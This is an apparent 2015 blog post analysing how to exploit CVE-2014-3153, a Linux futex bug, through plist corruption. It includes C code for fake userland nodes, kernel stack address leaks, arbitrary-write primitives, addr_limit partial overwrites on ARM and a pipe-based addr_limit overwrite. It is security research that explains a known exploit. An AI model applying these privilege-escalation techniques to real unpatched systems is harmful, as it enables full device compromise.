On exploiting CVE-2014-3153

14 April 2015

Introduction

This vulnerability has already been covered extensively. The purpose of this post is to discuss some exploitation details, mainly related to kernel structure corruption. For further details on the vulnerability context, see the references at the end.

Depending on the kernel version, either a list or a red-black tree gets corrupted. In this post, we only focus on the list version.

Kernel stack node

The main idea behind this vulnerability is that an attacker can partially control a node within a linked list. Partially, because this node lives on the kernel stack of a thread, so its exact address/offset is hard to guess. The general approach, used by towelroot and others, is to fill the kernel stack with a single repeated value, which overwrites every field of the targeted structure. The exact structure is a plist_node:

struct plist_node {
        int                     prio;
        struct list_head        prio_list;
        struct list_head        node_list;
};
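
To make the effect of the stack spray concrete, here is a small userland mock-up (not exploit code) of what the corrupted node ends up looking like; the SPRAY_VALUE used is of course hypothetical:

#include <stdio.h>

/* Userland mock-ups of the kernel structures, for illustration only
 * (32-bit build assumed, as on the targets discussed here). */
struct list_head {
        struct list_head *next, *prev;
};

struct plist_node {
        int                     prio;
        struct list_head        prio_list;
        struct list_head        node_list;
};

#define SPRAY_VALUE 0xa0000800u         /* hypothetical sprayed value */

int main(void)
{
        struct plist_node corrupted;
        unsigned int *p = (unsigned int *)&corrupted;
        unsigned int i;

        /* Every 32-bit word of the node ends up holding the same value,
         * exactly like the sprayed kernel stack. */
        for (i = 0; i < sizeof(corrupted) / sizeof(*p); i++)
                p[i] = SPRAY_VALUE;

        /* prio is now negative (SPRAY_VALUE interpreted as a signed int)
         * and every list pointer holds that same value. */
        printf("prio           = %d\n", corrupted.prio);
        printf("prio_list.next = %p\n", (void *)corrupted.prio_list.next);
        printf("node_list.prev = %p\n", (void *)corrupted.node_list.prev);
        return 0;
}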

Here is the initial state once the stack has been corrupted:

Initial state

Here is a brief description from linux/plist.h of how the list is managed:

/*
 * Simple ASCII art explanation:
 *
 * pl:prio_list (only for plist_node)
 * nl:node_list
 *   HEAD|             NODE(S)
 *       |
 *       ||------------------------------------|
 *       ||->|pl|<->|pl|<--------------->|pl|<-|
 *       |   |10|   |21|   |21|   |21|   |40|   (prio)
 *       |   |  |   |  |   |  |   |  |   |  |
 *       |   |  |   |  |   |  |   |  |   |  |
 * |->|nl|<->|nl|<->|nl|<->|nl|<->|nl|<->|nl|<-|
 * |-------------------------------------------|
 *
 * The nodes on the prio_list list are sorted by priority to simplify
 * the insertion of new nodes. There are no nodes with duplicate
 * priorities on the list.
 *
 * The nodes on the node_list are ordered by priority and can contain
 * entries which have the same priority. Those entries are ordered
 * FIFO
*/
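
For reference, the insertion logic the exploit will abuse lives in lib/plist.c. Roughly (debug checks removed), plist_add() of that era looks like this:

void plist_add(struct plist_node *node, struct plist_head *head)
{
        struct plist_node *first, *iter, *prev = NULL;
        struct list_head *node_next = &head->node_list;

        if (plist_head_empty(head))
                goto ins_node;

        first = iter = plist_first(head);

        do {
                /* stop at the first node with a higher prio value */
                if (node->prio < iter->prio) {
                        node_next = &iter->node_list;
                        break;
                }

                prev = iter;
                iter = list_entry(iter->prio_list.next,
                                struct plist_node, prio_list);
        } while (iter != first);

        if (!prev || prev->prio != node->prio)
                list_add_tail(&node->prio_list, &iter->prio_list);
ins_node:
        list_add_tail(&node->node_list, node_next);
}

Note that the traversal follows prio_list.next, i.e. exactly the pointers we control in the corrupted node, and that the final linking is done through list_add_tail().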

Kernel address leakage

In the original exploit, a value with prio < 0 is used, which makes a new node get inserted after the corrupted kernel node. Since the whole structure is overwritten with the same value, prio < 0 also means the corrupted node's pointers fall in the range 0x80000000-0xffffffff. By allocating memory in userspace at such an address (e.g., 0xa0000000), a fake userland node can be placed there:

Before node insertion
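
A minimal sketch of this setup, reusing the mock structures from the earlier sketch; the fixed mapping at 0xa0000000 matches the example above, while the exact layout (in particular which field of the corrupted node the sprayed value lands in) is an exploit-specific detail glossed over here:

#include <sys/mman.h>

struct list_head  { struct list_head *next, *prev; };
struct plist_node {
        int              prio;
        struct list_head prio_list;
        struct list_head node_list;
};

#define SPRAY_ADDR 0xa0000000UL          /* hypothetical sprayed value */

static struct plist_node *fake, *fake_prev;

static int setup_fake_nodes(void)
{
        /* Back the address the corrupted kernel pointers refer to. */
        void *map = mmap((void *)SPRAY_ADDR, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
        if (map == MAP_FAILED)
                return -1;

        fake      = (struct plist_node *)SPRAY_ADDR;
        fake_prev = fake + 1;    /* the "previous" node the insertion needs */

        /* Link the two fake nodes together so that, seen from the kernel,
         * walking prev/next around the corrupted node looks consistent and
         * list_add_tail() can complete without crashing. */
        fake->prio_list.next = &fake_prev->prio_list;
        fake->prio_list.prev = &fake_prev->prio_list;
        fake->node_list.next = &fake_prev->node_list;
        fake->node_list.prev = &fake_prev->node_list;

        fake_prev->prio_list.next = &fake->prio_list;
        fake_prev->prio_list.prev = &fake->prio_list;
        fake_prev->node_list.next = &fake->node_list;
        fake_prev->node_list.prev = &fake->node_list;

        /* Assumption: a large prio makes new waiters stop in front of
         * this node; real exploits tune this value. */
        fake->prio = fake_prev->prio = 0x7fffffff;
        return 0;
}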

Note how we set up two nodes in userspace. Without the previous one, the insertion of a new node would fail. After the insertion, here is the state of the list:

After node insertion

Note how the corrupted node plays little role in the insertion. This is because list_add_tail only relies on the next node's data:

static inline void list_add_tail(struct list_head *new, struct list_head *head)
{
        __list_add(new, head->prev, head);
}

static inline void __list_add(struct list_head *new,
                              struct list_head *prev,
                              struct list_head *next)
{
        next->prev = new;
        new->next = next;
        new->prev = prev;
        prev->next = new;
}

Both our userland nodes now contain references to the new node. This leaks the address of the kernel stack of the thread associated with the new node.
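
Reading the leak back is then just a matter of dereferencing our own mapping. Continuing the same hypothetical setup:

#define THREAD_SIZE 0x2000UL    /* 8KB kernel stacks on 32-bit ARM */

/* Called after the victim thread has blocked and its waiter has been
 * inserted into the corrupted list. */
static unsigned long leak_thread_info(void)
{
        /* list_add_tail() updated our fake node so that it now points to
         * the new waiter, which lives on the victim's kernel stack. */
        unsigned long waiter = (unsigned long)fake->node_list.prev;

        /* thread_info sits at the bottom of the kernel stack, so masking
         * the leaked stack address gives its location. */
        return waiter & ~(THREAD_SIZE - 1);
}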

Kernel memory corruption

The other primitive required is the ability to modify, or corrupt, an arbitrary address. This can be achieved by using one of the userland node's pointers. We start with a fake node which has one pointer to the location we want to overwrite:

Corruption primitive - Before node insertion

When a new node is inserted, the targeted memory is used as a list element:

Corruption primitive - After node insertion

Note how the arbitrary kernel memory now points to the new node. Next, we may delete that node:

Corruption primitive - After node deletion

Once the node is deleted, the targeted memory points to our userland node. This primitive can be exploited with two different methods.
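
Before looking at them, note that the write itself is performed by the generic unlinking helper in include/linux/list.h, which the deletion path eventually reaches. With the targeted memory acting as prev and our fake userland node as next:

static inline void __list_del(struct list_head *prev, struct list_head *next)
{
        /* next->prev: stores the targeted kernel address into our fake
         * userland node (harmless). */
        next->prev = prev;
        /* prev->next: stores the address of our fake userland node into
         * the targeted kernel memory. */
        prev->next = next;
}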

Partial overwrite

At the end of the corruption, the targeted kernel memory points to a userspace address. If we are targeting addr_limit, this is of little interest on its own, because the maximum value we may choose (0xbfffffff) is already below the default addr_limit. To overcome this, Dougall uses a partial overwrite: he writes a value such as 0xb000ffff at addr_limit+2. On a little-endian machine, this sets the upper half of addr_limit to 0xffff, pushing the limit deep into kernel space (from where it is then trivial to set it to 0xffffffff).
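
A worked byte-level example of this partial overwrite, with made-up values (0xc0000000 as the usual 32-bit default limit, and an arbitrary value for whatever field follows):

#include <stdio.h>
#include <string.h>

int main(void)
{
        /* A mock of the memory around addr_limit; the field that follows
         * it (restart_block on x86, task on ARM) is just made up here. */
        unsigned char mem[8];
        unsigned int  addr_limit = 0xc0000000;   /* usual 32-bit default  */
        unsigned int  next_field = 0x11223344;   /* whatever follows      */
        unsigned int  node_addr  = 0xb000ffff;   /* fake node address     */

        memcpy(mem,     &addr_limit, 4);
        memcpy(mem + 4, &next_field, 4);

        /* The unlink write lands at addr_limit + 2 (little endian). */
        memcpy(mem + 2, &node_addr, 4);

        memcpy(&addr_limit, mem,     4);
        memcpy(&next_field, mem + 4, 4);
        printf("addr_limit = 0x%08x\n", addr_limit);   /* 0xffff0000 */
        printf("next field = 0x%08x\n", next_field);   /* 0x1122b000 */
        return 0;
}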

However, with a partial overwrite, whatever comes after will also be overwritten. On x86, a struct restart_block follows addr_limit. As it is only used in corner cases, the partial overwrite is unlikely to have any negative collateral effect there. Unfortunately, the situation is quite different on ARM:

struct thread_info {
        unsigned long           flags;          /* low level flags */
        int                     preempt_count;  /* 0 => preemptable, <0 => bug */
        mm_segment_t            addr_limit;     /* address limit */
        struct task_struct      *task;          /* main task structure */
        struct exec_domain      *exec_domain;   /* execution domain */
        [...]
}

Having a corrupted task pointer will make your kernel die pretty quickly. One option from here is to be more careful and overwrite only three bytes of addr_limit, so that just the least significant byte of the task pointer gets modified. This is still possible with a userland address such as 0x00ffffff. Even then, we are still corrupting one byte.

task_struct alignment

The task structures are allocated from a dedicated slab cache, which is created in kernel/fork.c:

void __init fork_init(unsigned long mempages)
{
#ifndef CONFIG_ARCH_TASK_STRUCT_ALLOCATOR
#ifndef ARCH_MIN_TASKALIGN
#define ARCH_MIN_TASKALIGN      L1_CACHE_BYTES
#endif
        /* create a slab on which task_structs can be allocated */
        task_struct_cachep =
                kmem_cache_create("task_struct", sizeof(struct task_struct),
                        ARCH_MIN_TASKALIGN, SLAB_PANIC | SLAB_NOTRACK, NULL);
#endif
[...]

The task_struct will therefore be aligned on L1_CACHE_BYTES. On ARM, depending on the compilation options, this is between 6 bits, i.e. 64 bytes (vexpress_defconfig), and 8 bits, i.e. 256 bytes (goldfish_armv7_defconfig). This means that in the worst case, only 2 bits of the pointer's low byte are left unknown. Therefore, using a value of 0x00ffffff, we have at worst a one-in-four chance of overwriting the task pointer's low byte with the correct value.
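
The same kind of byte-level check for the three-byte variant, with a made-up (64-byte aligned) task pointer:

#include <stdio.h>
#include <string.h>

int main(void)
{
        /* Mock of the ARM thread_info slice: addr_limit then task. */
        unsigned char mem[8];
        unsigned int  addr_limit = 0xbf000000;   /* default on 32-bit ARM    */
        unsigned int  task       = 0xc65d3240;   /* made up, 64-byte aligned */
        unsigned int  node_addr  = 0x00ffffff;   /* fake node address        */

        memcpy(mem,     &addr_limit, 4);
        memcpy(mem + 4, &task,       4);

        /* 4-byte write at addr_limit + 1: three bytes of addr_limit and
         * only the low byte of task are touched (little endian). */
        memcpy(mem + 1, &node_addr, 4);

        memcpy(&addr_limit, mem,     4);
        memcpy(&task,       mem + 4, 4);
        printf("addr_limit = 0x%08x\n", addr_limit);   /* 0xffffff00 */
        printf("task       = 0x%08x\n", task);         /* 0xc65d3200 */
        return 0;
}

Here the guess happens to be wrong (the real low byte was 0x40); with 64-byte alignment it is correct one time in four, and with 256-byte alignment it is always correct.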

Double overwrite

The other method, used by towelroot, requires a bit more effort. Two threads with separate nodes are used. The first one is inserted within the list and its kernel stack address is leaked. Then, a second node is inserted, targeting the addr_limit of the first thread. Depending on how the two threads end up ordered in memory, the second overwrite may leave the first thread's addr_limit high enough to cover its own thread_info. The first thread can then overwrite its own addr_limit with any value.
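
The post does not detail how that last overwrite is performed. One classic way, shown here purely as an illustration (not necessarily what towelroot does), is to let the kernel perform the write through a pipe, using the addr_limit address derived from the leaked stack (offset 8 in the thread_info layout shown above):

#include <unistd.h>

/* Hypothetical: kernel address of the first thread's own addr_limit,
 * computed from its leaked kernel stack (thread_info sits at the stack
 * base, addr_limit at offset 8 in the layout above). */
static unsigned long addr_limit_addr;

static int pipefd[2];

/* Run by the first thread once the second overwrite has raised its
 * addr_limit above addr_limit_addr: the kernel copies the data for us,
 * and the destination now passes the (too permissive) access_ok() check. */
static void unlock_addr_limit(void)
{
        unsigned long unlimited = 0xffffffff;

        pipe(pipefd);
        write(pipefd[1], &unlimited, sizeof(unlimited));
        read(pipefd[0], (void *)addr_limit_addr, sizeof(unlimited));
}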

What if prio > 0 ?

Would such exploitation be possible for prio > 0 (and greater than the maximum priority)? In this case, any new node would be inserted before the corrupted node. This gives us the following state:

Initial state - prio > 0

We still manage to leak the address of the kernel stack, but all the addresses are evaluated from the corrupted node, which gives us no control over the new node's pointers. Interestingly, note how both the prio_list and node_list of the new node point to the prio_list of the fake userland node.

References